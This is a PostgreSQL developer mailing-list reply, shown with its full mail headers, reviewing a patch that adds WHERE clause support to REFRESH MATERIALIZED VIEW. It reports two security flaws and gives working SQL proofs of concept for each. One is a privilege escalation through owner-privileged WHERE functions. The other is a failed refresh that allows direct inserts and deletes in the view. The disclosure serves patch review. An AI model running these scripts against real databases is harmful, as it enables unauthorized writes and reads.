Received: from malur.postgresql.org ([217.196.149.56]) by arkaria.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96) (envelope-from ) id 1wSOF9-0039RT-2O for pgsql-hackers@arkaria.postgresql.org; Thu, 28 May 2026 00:04:59 +0000 Received: from localhost ([127.0.0.1] helo=malur.postgresql.org) by malur.postgresql.org with esmtp (Exim 4.96) (envelope-from ) id 1wSOF7-00AH0h-2D for pgsql-hackers@arkaria.postgresql.org; Thu, 28 May 2026 00:04:58 +0000 Received: from magus.postgresql.org ([2a02:c0:301:0:ffff::29]) by malur.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96) (envelope-from ) id 1wSOF7-00AH0Z-1F for pgsql-hackers@lists.postgresql.org; Thu, 28 May 2026 00:04:58 +0000 Received: from mail-yw1-x1134.google.com ([2607:f8b0:4864:20::1134]) by magus.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (Exim 4.98.2) (envelope-from ) id 1wSOF5-00000001lxk-3kgK for pgsql-hackers@lists.postgresql.org; Thu, 28 May 2026 00:04:58 +0000 Received: by mail-yw1-x1134.google.com with SMTP id 00721157ae682-7bdc947aaa3so127262637b3.0 for ; Wed, 27 May 2026 17:04:55 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1779926694; cv=none; d=google.com; s=arc-20240605; b=cZtjqH7XqmyZyZXwiO+08pDUeoj/JKT0eaqAWxS2auchJgXUBBSXBnX7DNhJIfIMmF kvtUDqlVPVfC0UmR8ztNdSf+B7/7MlN8xmdKtFHW0zSvBxq4IJYX8hKAoAf+7NbmXKzw 3KRkMdLwMqAE/WTyPffJ+K+AnQSqSQcYZJl3OWIG5agbVWEIzGrBPJbVvp7qbJ7BSsEr ctVt2+DSfztdbVNJq+Sp8itzW5RWb79GO2zubaq8vDIRS0ND64xcZGQnYlg34FuqQWGN 0Z0RB2ufb+P/EGWcp/ucFWqf1TvNurw/nnwodTbUZFkYIqVo8XUF/ZOTy0bGvCSCDpKB 3XfQ== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20240605; h=to:subject:message-id:date:mime-version:references:in-reply-to:from :dkim-signature; bh=Jfz+Cvk03kclJfk1Y5mldRguH/xt9w6Y2tmeoXyX2gM=; fh=nwNxTtLLPTU0ewfLM7SSbrjMajMl+wwnFkCY/fi90vE=; b=XySJ/fKo0fhOyU2mID3XSdoBNVx5GimOFBlhaYsP0XzeQmR5p7sslbmlwmdYb9WViT oLCNuHRVZF8g1t8QG9SDnpKyaARir1qysftnB0BpbW/L9Rkk+r5dnWB2iulqrJc7f1pw runBin5jbqOCMEWACjLXWHv3HiJlpqCVWo94uOCfcBqdLcCmUJ0lHeXCjtO+BwT2vg3h y1TfIy7XkQDs4tGwIgHph9PfWM2KMnBwfE7+omb7MSKufO2FoDj/CV6rsTLP0ji+CIeW j7pOHA3rM7AWlifUAhhSRSrCemcXh/a74u0GRtJWX0A7J4iTir3b3gdzVanRprpGamGM OPKg==; darn=lists.postgresql.org ARC-Authentication-Results: i=1; mx.google.com; arc=none DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=percona.com; s=google; t=1779926694; x=1780531494; darn=lists.postgresql.org; h=to:subject:message-id:date:mime-version:references:in-reply-to:from :from:to:cc:subject:date:message-id:reply-to; bh=Jfz+Cvk03kclJfk1Y5mldRguH/xt9w6Y2tmeoXyX2gM=; b=Mrk31AJJ67L1de0yV0e/TDDNNStSX5CaZL9ijbfYhRbjLwxBO66Hw1b+FH9rECS92D 3oI/2XPRwh1zllCHjYG/XIoPaNJPEDtpgSci0XOM1MCM/eyo1aoVb5TEWh782U7psLhu r3nHSXs4xK7EuS2tLoF9PoAJD5tLVqrHLTXnU= X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20251104; t=1779926694; x=1780531494; h=to:subject:message-id:date:mime-version:references:in-reply-to:from :x-gm-gg:x-gm-message-state:from:to:cc:subject:date:message-id :reply-to; bh=Jfz+Cvk03kclJfk1Y5mldRguH/xt9w6Y2tmeoXyX2gM=; b=hwW847bP6kJZgXtBK1e8JhGCZ6/gHC0TToyoO9Ag7S9X0HPqPNqUnfhBXvMC+DkTgY uFvz4h7n8/pMFETDWAM/fw4lTgr+R9ohhqQbxmlfWMxQMzRMG/8qSLW/YugWWSbUXudh 0K+vxs0/5Dh36t7KVXiXnHa7IrYpKse8zTQEjfUCbWNPQS6BuTWxyeY8vXUKSOLMxAO3 aY5EWc0YvUEpmEDcaMIfMg6VhKNkEGIqzZro6ZtWUbhMxMD29DCaZ85i6ZA1vq2zWe5M NUc4WToiSpVbe76xIh6LbJ8tkjBV2mvbCMHdICuGezLydxbZ8K+oWhoRY9mADxVofzFZ LxrA== X-Gm-Message-State: AOJu0YwG4FstivAUqEcnOwAnbL1yDfoOSa4bnyK3Egf5TvLLj37rbjDh yCpLp2npTNcJOmeZ8tWeFvlwaBGDOXpCX2OYvfVO5oF294txqxB8soLkeSeSZVc0X4+yG6tMROX T6vivq0U80K/v3bsu8NC4gAmOFTqeeGvzOYzR5WzkSIH9ng/VwXbngcOuNqEpIjhGmFv4NWDLBK bf9zk1Y5X9wnQOJUnM0wh6FP6Sg2AW+ZZdVIXADnjESxq2wS4viIe/mU7w5zd3Z9jM0uj6WQQdt QEPTDJybRIT6uv+2lV2WiZdR+/s2ByZh0qEqdsmkBVsQSx1kHuc9T1I2j5wnnntUpRb/T4bQmH4 ow== X-Gm-Gg: Acq92OGPZso+Y3qQf9fSISx6JM3upJZRi4blUhwtQlIcxudAld34ZNOfXZJxXe21+Db m6YmxOaItggb5XlOx62wjH3p/jhbVAaryO9Y3mUzkAHJGSfMOh4+puc5hJ6duIqvhnzXEZ4XybV wQiXgJIZCg2oslffbZ7zF4j3i0hAXtphtPyhITDdlwvdZJr1NsxqFNKcRauxoSgjxvma3oN32II FaLEuGlzx5rKIqFiXJcL7kzB7c0HhzFyx/q44fii1KohLI4MWYxUHUKWsSYOTg5pU52xAgeIg0H y2Bj4bxhOrQmpl8Fc7dpsVfrFpvrUg86+G3w2NMC3Nr4qCATWEaxF+uoR0hRZZ/dpMW5d9CgOTy JsvQ= X-Received: by 2002:a05:690c:b8b:b0:7ba:eefe:9fb3 with SMTP id 00721157ae682-7d3355db4f4mr284385567b3.2.1779926693572; Wed, 27 May 2026 17:04:53 -0700 (PDT) Received: from 298783833264 named unknown by gmailapi.google.com with HTTPREST; Wed, 27 May 2026 17:04:53 -0700 Received: from 298783833264 named unknown by gmailapi.google.com with HTTPREST; Wed, 27 May 2026 17:04:53 -0700 From: Zsolt Parragi In-Reply-To: References: MIME-Version: 1.0 Date: Wed, 27 May 2026 17:04:53 -0700 X-Gm-Features: AVHnY4IGZ6YVgRcxwRI5numijPyXP9cjYn1ehburvWlepaWh099a3RAhE5W31sc Message-ID: Subject: Re: [Patch] Add WHERE clause support to REFRESH MATERIALIZED VIEW To: pgsql-hackers@lists.postgresql.org Content-Type: text/plain; charset="UTF-8" X-CLOUD-SEC-AV-Sent: true X-CLOUD-SEC-AV-Info: percona,google_mail,monitor X-Gm-Spam: 0 X-Gm-Phishy: 0 List-Id: List-Help: List-Subscribe: List-Post: List-Owner: List-Archive: Archived-At: Precedence: bulk Hello! The patch in its current form has a security escalation bug, WHERE functions are executed with the privileges of the owner, not the maintainer. As one example, see the following script demonstrates unprivileged write, but reads are also of course possible: CREATE ROLE mvowner; CREATE ROLE lowpriv; CREATE SCHEMA atk AUTHORIZATION lowpriv; CREATE TABLE loot (note text); CREATE MATERIALIZED VIEW mv AS SELECT 1 AS id; CREATE UNIQUE INDEX ON mv (id); ALTER TABLE loot OWNER TO mvowner; ALTER MATERIALIZED VIEW mv OWNER TO mvowner; GRANT MAINTAIN ON mv TO lowpriv; SET ROLE lowpriv; GRANT USAGE ON SCHEMA atk TO mvowner; CREATE FUNCTION atk.w() RETURNS void LANGUAGE plpgsql VOLATILE AS $$ BEGIN INSERT INTO public.loot VALUES ('written by ' || current_user); END $$; CREATE FUNCTION atk.p(int) RETURNS boolean LANGUAGE plpgsql STABLE AS $$ BEGIN PERFORM atk.w(); RETURN true; END $$; REFRESH MATERIALIZED VIEW mv WHERE atk.p(id); RESET ROLE; SELECT DISTINCT note FROM loot; Only maintain permission + write access to any schema is required for it. There's also another issue where an error during refresh removes the modification restrictions: CREATE TABLE base (id int, code int, val text); INSERT INTO base VALUES (1, 100, 'a'), (2, 200, 'b'), (3, 300, 'c'); CREATE MATERIALIZED VIEW mv AS SELECT id, code, val FROM base; CREATE UNIQUE INDEX mv_code_uq ON mv (code); -- fails as it should DELETE FROM mv WHERE id = 1; -- will fail, as it should UPDATE base SET code = 999 WHERE id IN (1, 2); REFRESH MATERIALIZED VIEW mv WHERE id <= 2; -- succeeds, but it shouldn't DELETE FROM mv WHERE id = 1; -- we can also insert now INSERT INTO mv (id, code, val) VALUES (42, 4242, 'injected');